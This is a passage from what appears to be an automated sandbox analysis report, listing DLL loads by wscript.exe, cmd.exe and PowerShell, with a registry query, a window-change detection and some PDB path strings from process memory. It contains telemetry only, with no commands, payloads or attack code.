                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdb9 source: powershell.exe, 00000016.00000002.2783605754.00000000071EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: corlib.pdbX0+ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Management.Infrastructure.Native.pdb) source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdba0$ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb; source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
